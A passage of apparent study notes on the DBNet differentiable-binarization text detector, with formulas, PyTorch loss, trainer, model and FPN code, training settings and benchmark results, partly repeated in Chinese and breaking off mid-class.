                inter_out_channels = in_channels
            module_list = [
                nn.Upsample(scale_factor=2, mode='nearest'),  # double the spatial size with nearest-neighbor interpolation
                nn.Conv2d(in_channels, inter_out_channels, 3, 1, 1, bias=bias)]  # then refine with a conv layer
            if out_channels == 1:
                # If out_channels is 1, add one more conv layer to adjust the channel count.
                module_list.append(nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=1, bias=True))
            return nn.Sequential(*module_list)
        else:
            # Otherwise use a transposed convolution (nn.ConvTranspose2d) to double the spatial size.
            return nn.ConvTranspose2d(in_channels, out_channels, 2, 2)

    def step_function(self, x, y):
        # The step function producing the approximate binary map: a sigmoid-like curve of the
        # difference between x (shrink map) and y (threshold map), yielding values in (0, 1).
        return torch.reciprocal(1 + torch.exp(-self.k * (x - y)))
1. The input image is fed into a feature-pyramid backbone.

2. The pyramid features are upsampled to the same scale and concatenated to produce the feature $F$.

3. The feature $F$ is used to predict both the probability map $P$ and the threshold map $T$.

4. DB computes the approximate binary map $\hat B$ from $P$ and $T$.

• During training, supervision is applied to $P$, $T$, and $\hat B$, where $P$ and $\hat B$ share the same supervision.

• During inference, bounding boxes can easily be obtained from either $\hat B$ or $P$ by the box formulation module.

    Binarization

    Standard binarization

A single hard cutoff for every pixel.

$$B_{i,j}=\begin{cases}1 & \mathrm{if}\ P_{i,j}\ge t\\0 & \mathrm{otherwise}\end{cases}$$

Given the probability map $P\in R^{H\times W}$ produced by the segmentation network, where $H$ and $W$ denote its height and width, it must be converted into a binary map $B\in R^{H\times W}$ in which pixels with value $1$ are considered valid text regions. Here $t$ is a predefined threshold and $(i,j)$ denotes a coordinate in the map.

    Differentiable binarization

The formula above is not differentiable, so it cannot be optimized together with the segmentation network during training. An approximate step function is therefore used for binarization:

    $$\hat B_{i,j}=\frac{1}{1+e^{-k(P_{i,j}-T_{i,j})}}$$

where $\hat B$ is the approximate binary map, $T$ is the adaptive threshold map learned by the network, and $k$ is an amplification factor, empirically set to 50.

def step_function(self, x, y):
    # This step_function is exactly the differentiable binarization formula.
    return torch.reciprocal(1 + torch.exp(-self.k * (x - y)))

The larger DB's $k$, the closer it gets to standard binarization.

Why DB improves performance can be explained through the back-propagated gradients. Take binary cross-entropy as an example. Define $f(x)=\frac{1}{1+e^{-kx}}$ as the DB function, where $x=P_{i,j}-T_{i,j}$. Then the losses for positive labels, $l_{+}$, and for negative labels, $l_{-}$, are:

$$l_{+}=-\log\frac{1}{1+e^{-kx}}$$

$$l_{-}=-\log\left(1-\frac{1}{1+e^{-kx}}\right)$$

The derivatives of the losses follow easily from the chain rule:

$$\begin{aligned}&\frac{\partial l_+}{\partial x}=-kf(x)e^{-kx}\\&\frac{\partial l_-}{\partial x}=kf(x)\end{aligned}$$

From the derivatives of $l_{+}$ and $l_{-}$ we can see that:

1. the gradient is amplified by the factor $k$;
2. the amplification is most significant in wrongly predicted regions (for $l_+$, $x<0$; for $l_-$, $x>0$), which benefits optimization and helps produce more distinctive predictions. Moreover, since $x=P_{i,j}-T_{i,j}$, the gradient of $P$ is affected and rescaled by $T$ differently in foreground and background. A quick numeric check follows.
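
A small numeric illustration of the amplification factor; the probe value 0.05, standing for a pixel slightly above its threshold, is invented for the example:

import math

def db(x, k):
    return 1 / (1 + math.exp(-k * x))

for k in (1, 50):
    # With k=1 the output barely moves off 0.5; with k=50 it saturates towards 1.
    print(k, db(0.05, k))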

Adaptive threshold

The threshold map is predicted adaptively rather than fixed.

Deformable convolution

Deformable convolution gives the model a flexible receptive field, which particularly benefits text instances with extreme aspect ratios. Modulated deformable convolution is applied in all 3×3 convolution layers of the conv3, conv4, and conv5 stages of the ResNet-18 or ResNet-50 backbone.

Label generation

Label generation: text polygon annotations are drawn as red lines; the shrunk and dilated polygons are drawn as blue and green lines, respectively.

Label generation for the probability map is inspired by PSENet. Given a text image, each polygon of a text region is described by a set of line segments:

$$G=\{S_k\}_{k=1}^{n}$$

where $n$ is the number of vertices, which may differ across datasets: 4 for the ICDAR 2015 dataset (Karatzas et al.) and 16 for CTW1500.

The positive region is generated by shrinking the polygon $G$ to $G_s$ with the Vatti clipping algorithm. The shrink offset $D$ is computed from the perimeter $L$ and the area $A$ of the original polygon:

$$D=\frac{A(1-r^2)}{L}$$

where $r$ is the shrink ratio, empirically set to 0.4.

By a similar procedure, labels for the threshold map can be generated. First, the text polygon $G$ is dilated with the same offset $D$ to $G_d$. The gap between $G_s$ and $G_d$ is treated as the border of the text region, where the threshold-map label is generated by computing the distance to the closest segment in $G$.

This is implemented in data_loader:

• starting from the human-labeled gt boxes (sequences of coordinate points), apply dilate and shrink operations
• compute within the gt boxes to obtain the probability_map and the threshold_map; a sketch of the shrink step follows
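
A minimal sketch of the shrink step, assuming shapely and pyclipper are installed (the libraries commonly used for this in DBNet implementations); the square is a made-up example polygon:

import numpy as np
import pyclipper
from shapely.geometry import Polygon

def shrink_polygon(points, r=0.4):
    poly = Polygon(points)
    d = poly.area * (1 - r ** 2) / poly.length  # D = A(1 - r^2) / L, as in the paper
    offset = pyclipper.PyclipperOffset()
    offset.AddPath([tuple(p) for p in points], pyclipper.JT_ROUND, pyclipper.ET_CLOSEDPOLYGON)
    shrunk = offset.Execute(-d)  # a negative offset shrinks; +D would dilate to G_d
    return [np.array(s) for s in shrunk]

square = [(0, 0), (100, 0), (100, 100), (0, 100)]
print(shrink_polygon(square))  # a smaller square, inset by D = 10000 * 0.84 / 400 = 21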

    Optimization

The loss $L$ is a weighted sum of the probability-map loss $L_s$, the binary-map loss $L_b$, and the threshold-map loss $L_t$:

$$L=L_s+\alpha\times L_b+\beta\times L_t$$

with $\alpha$ and $\beta$ set to 1.0 and 10, respectively.

Binary cross-entropy (BCE) loss is applied to both $L_s$ and $L_b$:

$$L_s=L_b=\sum_{i\in S_l}y_i\log x_i+(1-y_i)\log(1-x_i)$$

import torch
from torch import nn


class BalanceCrossEntropyLoss(nn.Module):
    # A balanced variant of cross-entropy for class imbalance: positive and negative samples
    # are weighted differently so training copes better with the imbalance.
    '''
    Balanced cross entropy loss.
    Shape:
        - Input: :math:`(N, 1, H, W)`
        - GT: :math:`(N, 1, H, W)`, same shape as the input
        - Mask: :math:`(N, H, W)`, same spatial shape as the input
        - Output: scalar.

    Examples::

        >>> m = nn.Sigmoid()
        >>> loss = nn.BCELoss()
        >>> input = torch.randn(3, requires_grad=True)
        >>> target = torch.empty(3).random_(2)
        >>> output = loss(m(input), target)
        >>> output.backward()
    '''

    def __init__(self, negative_ratio=3.0, eps=1e-6):
        # negative_ratio: ratio of negatives to positives, default 3.0 (three negatives per positive).
        # eps: a small constant (1e-6) that guards against division by zero.
        super(BalanceCrossEntropyLoss, self).__init__()
        self.negative_ratio = negative_ratio
        self.eps = eps

    def forward(self,
                pred: torch.Tensor,  # network prediction of shape (N, 1, H, W)
                gt: torch.Tensor,  # target, same shape as pred
                mask: torch.Tensor,  # mask of shape (N, H, W) marking the positive regions
                return_origin=False):
        '''
        Args:
            pred: shape :math:`(N, 1, H, W)`, the prediction of network
            gt: shape :math:`(N, 1, H, W)`, the target
            mask: shape :math:`(N, H, W)`, the mask indicates positive regions
        '''
        # Count positives and negatives, capping the negatives by the negative ratio.
        positive = (gt * mask).byte()
        negative = ((1 - gt) * mask).byte()
        positive_count = int(positive.float().sum())
        negative_count = min(int(negative.float().sum()), int(positive_count * self.negative_ratio))
        # Per-pixel binary cross-entropy.
        loss = nn.functional.binary_cross_entropy(pred, gt, reduction='none')
        positive_loss = loss * positive.float()
        negative_loss = loss * negative.float()
        # negative_loss, _ = torch.topk(negative_loss.view(-1).contiguous(), negative_count)
        # Compute positive and negative losses separately, then keep only the hardest negatives.
        negative_loss, _ = negative_loss.view(-1).topk(negative_count)

        # Weighted total loss.
        balance_loss = (positive_loss.sum() + negative_loss.sum()) / (positive_count + negative_count + self.eps)

        if return_origin:
            return balance_loss, loss
        return balance_loss

$L_t$ is the sum of $L_1$ distances between predictions and labels inside the dilated text polygon $G_d$:

$$L_t=\sum_{i\in R_d}|y^*_i-x^*_i|$$

class MaskL1Loss(nn.Module):
    # An L1-loss variant that uses a mask so the loss is computed only over the region of interest.
    def __init__(self, eps=1e-6):
        super(MaskL1Loss, self).__init__()
        self.eps = eps

    def forward(self, pred: torch.Tensor, gt, mask):
        # Absolute difference between prediction and ground truth, averaged over the mask.
        loss = (torch.abs(pred - gt) * mask).sum() / (mask.sum() + self.eps)
        return loss

In the inference stage, either the probability map or the approximate binary map can be used to generate text bounding boxes, with nearly identical results. The detected (shrunk) region is dilated back with offset $D'$:

$$D'=\frac{A'\times r'}{L'}$$

where $A'$ is the area of the shrunk polygon, $L'$ is its perimeter, and $r'$ is empirically set to 1.5.

    DB_loss.py

from torch import nn

from models.losses.basic_loss import BalanceCrossEntropyLoss, MaskL1Loss, DiceLoss


class DBLoss(nn.Module):
    def __init__(self, alpha=1.0, beta=10, ohem_ratio=3, reduction='mean', eps=1e-6):
        """
        Implement PSE Loss.
        :param alpha: coefficient on the binary-map loss
        :param beta: coefficient on the threshold-map loss
        :param ohem_ratio: OHEM ratio
        :param reduction: 'mean' or 'sum', average or sum the loss over the batch
        """
        super().__init__()
        assert reduction in ['mean', 'sum'], " reduction must in ['mean','sum']"
        # alpha and beta weight the different loss terms.
        self.alpha = alpha
        self.beta = beta
        self.bce_loss = BalanceCrossEntropyLoss(negative_ratio=ohem_ratio)
        self.dice_loss = DiceLoss(eps=eps)
        self.l1_loss = MaskL1Loss(eps=eps)
        self.ohem_ratio = ohem_ratio  # ratio used by OHEM (online hard example mining)
        self.reduction = reduction  # reduction mode for the loss (mean or sum)

    def forward(self, pred, batch):
        shrink_maps = pred[:, 0, :, :]
        threshold_maps = pred[:, 1, :, :]
        binary_maps = pred[:, 2, :, :]

        loss_shrink_maps = self.bce_loss(shrink_maps, batch['shrink_map'], batch['shrink_mask'])  # cross-entropy (with OHEM) on shrink_maps
        loss_threshold_maps = self.l1_loss(threshold_maps, batch['threshold_map'], batch['threshold_mask'])  # L1 loss on threshold_maps
        metrics = dict(loss_shrink_maps=loss_shrink_maps, loss_threshold_maps=loss_threshold_maps)
        if pred.size()[1] > 2:
            # If pred has more than two channels, also compute the Dice loss on binary_maps.
            loss_binary_maps = self.dice_loss(binary_maps, batch['shrink_map'], batch['shrink_mask'])
            metrics['loss_binary_maps'] = loss_binary_maps
            # Combine the loss terms; the total depends on whether binary_maps is present.
            loss_all = self.alpha * loss_shrink_maps + self.beta * loss_threshold_maps + loss_binary_maps
            metrics['loss'] = loss_all  # return a dict with each loss term and the total
        else:
            metrics['loss'] = loss_shrink_maps
        return metrics

    Experiments

from __future__ import print_function

import argparse
import os

import anyconfig


def init_args():
    parser = argparse.ArgumentParser(description='DBNet.pytorch')
    parser.add_argument('--config_file', default='config/open_dataset_resnet18_FPN_DBhead_polyLR.yaml', type=str)
    parser.add_argument('--local_rank', dest='local_rank', default=0, type=int, help='Use distributed training')

    args = parser.parse_args()
    return args


def main(config):
    # Import what is needed: model building, losses, data loaders, trainer, post-processing, and metrics.
    import torch
    from models import build_model, build_loss
    from data_loader import get_dataloader
    from trainer import Trainer
    from post_processing import get_post_processing
    from utils import get_metric
    # If more than one GPU is available, initialize the distributed training environment.
    if torch.cuda.device_count() > 1:
        torch.cuda.set_device(args.local_rank)
        torch.distributed.init_process_group(backend="nccl", init_method="env://", world_size=torch.cuda.device_count(), rank=args.local_rank)
        config['distributed'] = True
    else:
        config['distributed'] = False
    config['local_rank'] = args.local_rank

    # Load the train and validation data loaders from the config.
    train_loader = get_dataloader(config['dataset']['train'], config['distributed'])
    assert train_loader is not None
    if 'validate' in config['dataset']:
        validate_loader = get_dataloader(config['dataset']['validate'], False)
    else:
        validate_loader = None

    # Build the loss function and move it to the GPU.
    criterion = build_loss(config['loss']).cuda()

    # Set the model's input channel count (3 for color images, 1 for grayscale).
    config['arch']['backbone']['in_channels'] = 3 if config['dataset']['train']['dataset']['args']['img_mode'] != 'GRAY' else 1
    model = build_model(config['arch'])

    # Build the post-processing function and the evaluation metric.
    post_p = get_post_processing(config['post_processing'])
    metric = get_metric(config['metric'])

    # Create the Trainer and start training.
    trainer = Trainer(config=config,
                      model=model,
                      criterion=criterion,
                      train_loader=train_loader,
                      post_process=post_p,
                      metric_cls=metric,
                      validate_loader=validate_loader)
    trainer.train()


if __name__ == '__main__':
    # Fix up the module path so the current directory and its parent are importable.
    import sys
    import pathlib
    __dir__ = pathlib.Path(os.path.abspath(__file__))
    sys.path.append(str(__dir__))
    sys.path.append(str(__dir__.parent.parent))
    # project = 'DBNet.pytorch'  # project root directory
    # sys.path.append(os.getcwd().split(project)[0] + project)

    # Read the config file with anyconfig and resolve any base config it extends.
    from utils import parse_config

    args = init_args()
    assert os.path.exists(args.config_file)
    config = anyconfig.load(open(args.config_file, 'rb'))
    if 'base' in config:
        config = parse_config(config)
    # Call main to start training.
    main(config)
The Trainer class:

import time

import torch
import torchvision.utils as vutils
from tqdm import tqdm

from base import BaseTrainer
from utils import WarmupPolyLR, runningScore, cal_text_score


class Trainer(BaseTrainer):
    # __init__ takes the config, model, criterion, train/validate data loaders,
    # the metric class (metric_cls), and an optional post-processing function (post_process).
    def __init__(self, config, model, criterion, train_loader, validate_loader, metric_cls, post_process=None):
        super(Trainer, self).__init__(config, model, criterion)
        # Read show_images_iter from the config and set up the data loaders.
        # If a validation loader exists, a post-processing function and metric class must be provided.
        self.show_images_iter = self.config['trainer']['show_images_iter']
        self.train_loader = train_loader
        if validate_loader is not None:
            assert post_process is not None and metric_cls is not None
        self.validate_loader = validate_loader
        self.post_process = post_process
        self.metric_cls = metric_cls
        self.train_loader_len = len(train_loader)
        # Learning-rate scheduler: WarmupPolyLR supports warmup plus polynomial decay.
        if self.config['lr_scheduler']['type'] == 'WarmupPolyLR':
            warmup_iters = config['lr_scheduler']['args']['warmup_epoch'] * self.train_loader_len
            if self.start_epoch > 1:
                self.config['lr_scheduler']['args']['last_epoch'] = (self.start_epoch - 1) * self.train_loader_len
            self.scheduler = WarmupPolyLR(self.optimizer, max_iters=self.epochs * self.train_loader_len,
                                          warmup_iters=warmup_iters, **config['lr_scheduler']['args'])
        # Log the sample counts of the train and validation datasets.
        if self.validate_loader is not None:
            self.logger_info(
                'train dataset has {} samples,{} in dataloader, validate dataset has {} samples,{} in dataloader'.format(
                    len(self.train_loader.dataset), self.train_loader_len, len(self.validate_loader.dataset), len(self.validate_loader)))
        else:
            self.logger_info('train dataset has {} samples,{} in dataloader'.format(len(self.train_loader.dataset), self.train_loader_len))

    # _train_epoch trains the model for one epoch.
    def _train_epoch(self, epoch):
        # Put the model in training mode.
        self.model.train()
        # Record the epoch and batch start times.
        epoch_start = time.time()
        batch_start = time.time()
        # Initialize the accumulated loss, the running metric, and the current learning rate.
        train_loss = 0.
        running_metric_text = runningScore(2)
        lr = self.optimizer.param_groups[0]['lr']

        # Iterate over the batches of the training loader:
        for i, batch in enumerate(self.train_loader):
            if i >= self.train_loader_len:
                break
            self.global_step += 1
            lr = self.optimizer.param_groups[0]['lr']

            # Move the batch data to the GPU.
            for key, value in batch.items():
                if value is not None:
                    if isinstance(value, torch.Tensor):
                        batch[key] = value.to(self.device)
            cur_batch_size = batch['img'].size()[0]

            # Run the model to get predictions.
            preds = self.model(batch['img'])
            # Compute the loss dict, then back-propagate and step the optimizer.
            loss_dict = self.criterion(preds, batch)
            # backward
            self.optimizer.zero_grad()
            loss_dict['loss'].backward()
            self.optimizer.step()
            # If WarmupPolyLR is used, step the scheduler.
            if self.config['lr_scheduler']['type'] == 'WarmupPolyLR':
                self.scheduler.step()
            # acc iou
            # Compute score_shrink_map and record loss and accuracy.
            score_shrink_map = cal_text_score(preds[:, 0, :, :], batch['shrink_map'], batch['shrink_mask'], running_metric_text,
                                              thred=self.config['post_processing']['args']['thresh'])

            # Collect the losses into a log string and accumulate the total train loss.
            loss_str = 'loss: {:.4f}, '.format(loss_dict['loss'].item())
            for idx, (key, value) in enumerate(loss_dict.items()):
                loss_dict[key] = value.item()
                if key == 'loss':
                    continue
                loss_str += '{}: {:.4f}'.format(key, loss_dict[key])
                if idx < len(loss_dict) - 1:
                    loss_str += ', '

            train_loss += loss_dict['loss']
            acc = score_shrink_map['Mean Acc']
            iou_shrink_map = score_shrink_map['Mean IoU']

            # Every log_iter steps, log throughput (samples/sec), accuracy, IoU, loss, and learning rate
            # so the training process can be monitored.
            if self.global_step % self.log_iter == 0:
                batch_time = time.time() - batch_start
                self.logger_info(
                    '[{}/{}], [{}/{}], global_step: {}, speed: {:.1f} samples/sec, acc: {:.4f}, iou_shrink_map: {:.4f}, {}, lr:{:.6}, time:{:.2f}'.format(
                        epoch, self.epochs, i + 1, self.train_loader_len, self.global_step, self.log_iter * cur_batch_size / batch_time, acc,
                        iou_shrink_map, loss_str, lr, batch_time))
                batch_start = time.time()

            # If TensorBoard is enabled, write the training losses and metrics for visualization.
            if self.tensorboard_enable and self.config['local_rank'] == 0:
                # write tensorboard
                for key, value in loss_dict.items():
                    self.writer.add_scalar('TRAIN/LOSS/{}'.format(key), value, self.global_step)
                self.writer.add_scalar('TRAIN/ACC_IOU/acc', acc, self.global_step)
                self.writer.add_scalar('TRAIN/ACC_IOU/iou_shrink_map', iou_shrink_map, self.global_step)
                self.writer.add_scalar('TRAIN/lr', lr, self.global_step)
                # Every show_images_iter steps, add the input images, ground-truth labels, and
                # model predictions to TensorBoard, gridded with vutils.make_grid.
                if self.global_step % self.show_images_iter == 0:
                    # show images on tensorboard
                    self.inverse_normalize(batch['img'])
                    self.writer.add_images('TRAIN/imgs', batch['img'], self.global_step)
                    # shrink_labels and threshold_labels
                    shrink_labels = batch['shrink_map']
                    threshold_labels = batch['threshold_map']
                    shrink_labels[shrink_labels <= 0.5] = 0
                    shrink_labels[shrink_labels > 0.5] = 1
                    show_label = torch.cat([shrink_labels, threshold_labels])
                    show_label = vutils.make_grid(show_label.unsqueeze(1), nrow=cur_batch_size, normalize=False, padding=20, pad_value=1)
                    self.writer.add_image('TRAIN/gt', show_label, self.global_step)
                    # model output
                    show_pred = []
                    for kk in range(preds.shape[1]):
                        show_pred.append(preds[:, kk, :, :])
                    show_pred = torch.cat(show_pred)
                    show_pred = vutils.make_grid(show_pred.unsqueeze(1), nrow=cur_batch_size, normalize=False, padding=20, pad_value=1)
                    self.writer.add_image('TRAIN/preds', show_pred, self.global_step)
        # Return a dict with the epoch's average train loss, learning rate, total time, and epoch number.
        return {'train_loss': train_loss / self.train_loader_len, 'lr': lr, 'time': time.time() - epoch_start,
                'epoch': epoch}

    def _eval(self, epoch):
        # Evaluation mode changes model behavior, e.g. disabling dropout and freezing batch normalization.
        self.model.eval()
        # torch.cuda.empty_cache()  # speed up evaluating after training finished
        # raw_metrics stores each batch's metrics; total_frame counts processed frames; total_time the elapsed time.
        raw_metrics = []
        total_frame = 0.0
        total_time = 0.0
        for i, batch in tqdm(enumerate(self.validate_loader), total=len(self.validate_loader), desc='test model'):
            # Disable gradient computation to save memory and speed up evaluation.
            with torch.no_grad():
                # Move the batch data to the GPU.
                for key, value in batch.items():
                    if value is not None:
                        if isinstance(value, torch.Tensor):
                            batch[key] = value.to(self.device)
                # Record the start time and predict.
                start = time.time()
                preds = self.model(batch['img'])
                # Post-process the predictions.
                boxes, scores = self.post_process(batch, preds, is_output_polygon=self.metric_cls.is_output_polygon)
                # Update the statistics.
                total_frame += batch['img'].size()[0]
                total_time += time.time() - start
                # Compute and record the evaluation metric.
                raw_metric = self.metric_cls.validate_measure(batch, (boxes, scores))
                raw_metrics.append(raw_metric)
        # Aggregate the metrics.
        metrics = self.metric_cls.gather_measure(raw_metrics)
        # Log the frames per second (FPS).
        self.logger_info('FPS:{}'.format(total_frame / total_time))
        # Return the metrics.
        return metrics['recall'].avg, metrics['precision'].avg, metrics['fmeasure'].avg

    def _on_epoch_finish(self):
        # Runs at the end of every training epoch.
        # Log the current epoch's stats.
        self.logger_info('[{}/{}], train_loss: {:.4f}, time: {:.4f}, lr: {}'.format(
            self.epoch_result['epoch'], self.epochs, self.epoch_result['train_loss'], self.epoch_result['time'],
            self.epoch_result['lr']))
        # Paths for the latest and best checkpoints.
        net_save_path = '{}/model_latest.pth'.format(self.checkpoint_dir)
        net_save_path_best = '{}/model_best.pth'.format(self.checkpoint_dir)

        # Only the main process saves checkpoints.
        if self.config['local_rank'] == 0:
            # Save the current checkpoint.
            self._save_checkpoint(self.epoch_result['epoch'], net_save_path)
            save_best = False
            if self.validate_loader is not None and self.metric_cls is not None:  # use f1 as the best-model criterion
                # Evaluate the model (when a validation set and metric class are available).
                recall, precision, hmean = self._eval(self.epoch_result['epoch'])

                # Write the evaluation metrics to TensorBoard if enabled.
                if self.tensorboard_enable:
                    self.writer.add_scalar('EVAL/recall', recall, self.global_step)
                    self.writer.add_scalar('EVAL/precision', precision, self.global_step)
                    self.writer.add_scalar('EVAL/hmean', hmean, self.global_step)
                self.logger_info('test: recall: {:.6f}, precision: {:.6f}, f1: {:.6f}'.format(recall, precision, hmean))

                # Decide whether to save the best model by F1 score
                # (or by train loss when there is no validation set).
                if hmean >= self.metrics['hmean']:
                    save_best = True
                    self.metrics['train_loss'] = self.epoch_result['train_loss']
                    self.metrics['hmean'] = hmean
                    self.metrics['precision'] = precision
                    self.metrics['recall'] = recall
                    self.metrics['best_model_epoch'] = self.epoch_result['epoch']
            else:
                if self.epoch_result['train_loss'] <= self.metrics['train_loss']:
                    save_best = True
                    self.metrics['train_loss'] = self.epoch_result['train_loss']
                    self.metrics['best_model_epoch'] = self.epoch_result['epoch']
            # Log the best-model info and save the best checkpoint.
            best_str = 'current best, '
            for k, v in self.metrics.items():
                best_str += '{}: {:.6f}, '.format(k, v)
            self.logger_info(best_str)
            if save_best:
                import shutil
                shutil.copy(net_save_path, net_save_path_best)
                self.logger_info("Saving current best: {}".format(net_save_path_best))
            else:
                self.logger_info("Saving checkpoint: {}".format(net_save_path))

    def _on_train_finish(self):
        # Runs when training finishes: log all metrics, then log completion.
        for k, v in self.metrics.items():
            self.logger_info('{}:{}'.format(k, v))
        self.logger_info('finish train')

SynthText is a synthetic dataset of 800k images composed from 8k background images. This dataset is used only to pre-train the model.

Data augmentation for training includes (a sketch follows the list):

1. random rotation with an angle in the range $(-10^{\circ},10^{\circ})$
2. random cropping
3. random flipping
4. resizing all processed images to $640\times 640$ for training efficiency
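
A rough torchvision sketch of these image-level augmentations, illustrative only: a real detection pipeline must apply the same geometric transforms to the polygon labels, which torchvision's image transforms do not do:

import torchvision.transforms as T

augment = T.Compose([
    T.RandomRotation(degrees=10),                # random rotation in (-10°, 10°)
    T.RandomCrop(size=640, pad_if_needed=True),  # random crop (padding small images)
    T.RandomHorizontalFlip(),                    # random flip
    T.Resize((640, 640)),                        # final resize to 640x640
])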

• Pre-train for 100k iterations on the SynthText dataset
• Fine-tune the model on the corresponding real-world dataset for 1200 epochs
  • The training batch size is 16. A poly learning-rate policy is followed: the learning rate at the current iteration equals the initial rate multiplied by $(1-\frac{iter}{max\_iter})^{power}$ (see the check below)
    • the initial learning rate is 0.007 and $power$ is 0.9
    • weight decay is 0.0001 and momentum is 0.9
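
A quick check of the poly schedule (initial rate and power from the paper; the 100k max_iter is reused from the pre-training setting purely for illustration):

def poly_lr(initial_lr, iteration, max_iter, power=0.9):
    return initial_lr * (1 - iteration / max_iter) ** power

for it in (0, 50_000, 99_000):
    print(it, poly_lr(0.007, it, 100_000))  # decays from 0.007 towards 0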

Ablation study

Each module is shown to improve performance.

Comparisons with previous methods

Best on all three metrics: P, R, and F.

• TP: true positive; actually positive, predicted positive.
• FP: false positive; actually negative, predicted positive.
• TN: true negative; actually negative, predicted negative.
• FN: false negative; actually positive, predicted negative.

    $$P=\frac{TP}{TP+FP}$$

    $$R=\frac{TP}{TP+FN}$$

    $$F=\frac{2PR}{P+R}$$
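
As a check against the tables below: DB-ResNet-18 on Total-Text has $P=88.3$ and $R=77.9$, giving $F=\frac{2\times 88.3\times 77.9}{88.3+77.9}\approx 82.8$, which matches the reported value.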


Training results on Total-Text:

Method               P     R     F
DB-ResNet-18 (800)   88.3  77.9  82.8
DB-ResNet-50 (800)   87.1  82.5  84.7

Training results on CTW1500:

Method                P     R     F
Ours-ResNet18 (1024)  84.8  77.5  81.0
Ours-ResNet50 (1024)  86.9  80.2  83.4

Limitation

One limitation of the method is that it cannot handle "text inside text", where one text instance sits inside another. The shrunk text regions help when a text instance is not in the center region of another, but they fail when it lies exactly at another instance's center. This is a common limitation of segmentation-based scene text detectors.

Conclusion

It works well.

    ]]>
    + 资源

    正文

    Abstract

    • 基于分割的场景文本检测(可以获得像素级别的预测)可以更精确地描述曲线文本等各种形状的场景文本
    • 二值化的后处理对于基于分割的检测至关重要,该检测将分割方法产生的概率图转换为文本的边界框/区域
    • 提出了一个名为可微分二值化(DB)的模块,它可以在分割网络中执行二值化过程
    • 好使。

    Introduction

    ​ 本文的主要贡献是提出了可微的 DB 模块,它使二值化过程在 CNN 中可以端到端训练。

    webp

    • 大多数现有的检测方法使用类似的后处理流水线,如图所示(蓝色箭头后面):
      • 首先,它们设置了一个固定的阈值,用于将分割网络生成的概率图转换为二值图像;
      • 然后,使用像素聚类等启发式技术将像素分组到文本实例中。
    • 或者,我们的流水线(如图中的红色箭头所示)旨在将二值化操作插入到分割网络中进行联合优化。通过这种方式,可以自适应地预测图像每个位置的阈值,这可以完全区分像素与前景和背景。然而,标准的二值化函数是不可微的,我们提出了一种称为可微分二值化(DB)的近似函数,当与分割网络一起训练时,它是完全可微的。

    ​本文的主要贡献是提出了可微分的 DB 模块,这使得二值化过程在 CNN 中端到端可训练

    ​ 最近的场景文本检测方法大致可以分为两类:基于回归(Regression-based)的方法和基于分割(Segmentation-based)的方法。

    • 基于回归 Regression 的方法是一系列直接回归文本实例的边界框的模型。

    • 基于分割 Segmentation 的方法通常结合像素级预测和后处理算法来获得边界框

    • 快速的场景文本检测方法注重准确性和推理速度。

    Methodology

    webp

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
# -*- coding: utf-8 -*-
# @Time : 2019/8/23 21:57
# @Author : zhoujun
from addict import Dict
from torch import nn
import torch.nn.functional as F

from models.backbone import build_backbone
from models.neck import build_neck
from models.head import build_head


class Model(nn.Module):
    def __init__(self, model_config: dict):
        """
        PANnet
        :param model_config: model configuration
        """
        super().__init__()
        model_config = Dict(model_config)  # a config dict describing the model structure; wrapped in Dict for attribute access
        # Pop the backbone, neck and head types out of the config.
        backbone_type = model_config.backbone.pop('type')
        neck_type = model_config.neck.pop('type')
        head_type = model_config.head.pop('type')
        # Build the three parts with build_backbone, build_neck and build_head.
        self.backbone = build_backbone(backbone_type, **model_config.backbone)
        self.neck = build_neck(neck_type, in_channels=self.backbone.out_channels, **model_config.neck)
        self.head = build_head(head_type, in_channels=self.neck.out_channels, **model_config.head)
        # self.name combines the backbone, neck and head types into a model name.
        self.name = f'{backbone_type}_{neck_type}_{head_type}'

    def forward(self, x):
        _, _, H, W = x.size()  # x has shape [batch_size, channels, height, width]
        backbone_out = self.backbone(x)     # backbone features
        neck_out = self.neck(backbone_out)  # fused features from the neck
        y = self.head(neck_out)             # final prediction maps
        # Resize the output back to the input resolution to keep the spatial size consistent.
        y = F.interpolate(y, size=(H, W), mode='bilinear', align_corners=True)
        return y


if __name__ == '__main__':
    import torch

    device = torch.device('cpu')  # CPU device (switch to GPU if available)
    x = torch.zeros(2, 3, 640, 640).to(device)  # a zero tensor of shape [2, 3, 640, 640] as dummy input

    model_config = {
        'backbone': {'type': 'resnest50', 'pretrained': True, "in_channels": 3},
        'neck': {'type': 'FPN', 'inner_channels': 256},  # segmentation neck, FPN or FPEM_FFM
        'head': {'type': 'DBHead', 'out_channels': 2, 'k': 50},
    }
    model = Model(model_config=model_config).to(device)  # build the Model from the config dict
    import time  # time the forward pass

    tic = time.time()
    y = model(x)
    # Print the forward time, the output shape, the model name and the full module structure.
    print(time.time() - tic)
    print(y.shape)
    print(model.name)
    print(model)
    # (optional) save the state dict to PAN.pth
    # torch.save(model.state_dict(), 'PAN.pth')
• resnet
• MobileNetV3
• ShuffleNetV2
• FPN

  • This code implements a Feature Pyramid Network (FPN) module for fusing feature maps from different scales. It consists of:

    • reduce layers, which shrink each feature map's channel count to a smaller value;

    • smooth layers, which smooth the feature map of each level;

    • fusion and upsampling, which upsample and concatenate the feature maps of different levels to strengthen the representation;

    • a final convolution, which further processes the fused feature map into the output.

import torch
import torch.nn.functional as F
from torch import nn

from models.basic import ConvBnRelu


class FPN(nn.Module):
    def __init__(self, in_channels, inner_channels=256, **kwargs):
        """
        :param in_channels: output channels of the backbone stages
        :param kwargs:
        """
        super().__init__()
        inplace = True
        self.conv_out = inner_channels
        inner_channels = inner_channels // 4  # intermediate channel count used during fusion
        # Reduce layers: 1x1 convs that shrink each stage's channels to inner_channels.
        self.reduce_conv_c2 = ConvBnRelu(in_channels[0], inner_channels, kernel_size=1, inplace=inplace)
        self.reduce_conv_c3 = ConvBnRelu(in_channels[1], inner_channels, kernel_size=1, inplace=inplace)
        self.reduce_conv_c4 = ConvBnRelu(in_channels[2], inner_channels, kernel_size=1, inplace=inplace)
        self.reduce_conv_c5 = ConvBnRelu(in_channels[3], inner_channels, kernel_size=1, inplace=inplace)
        # Smooth layers: 3x3 convs that refine each pyramid level.
        self.smooth_p4 = ConvBnRelu(inner_channels, inner_channels, kernel_size=3, padding=1, inplace=inplace)
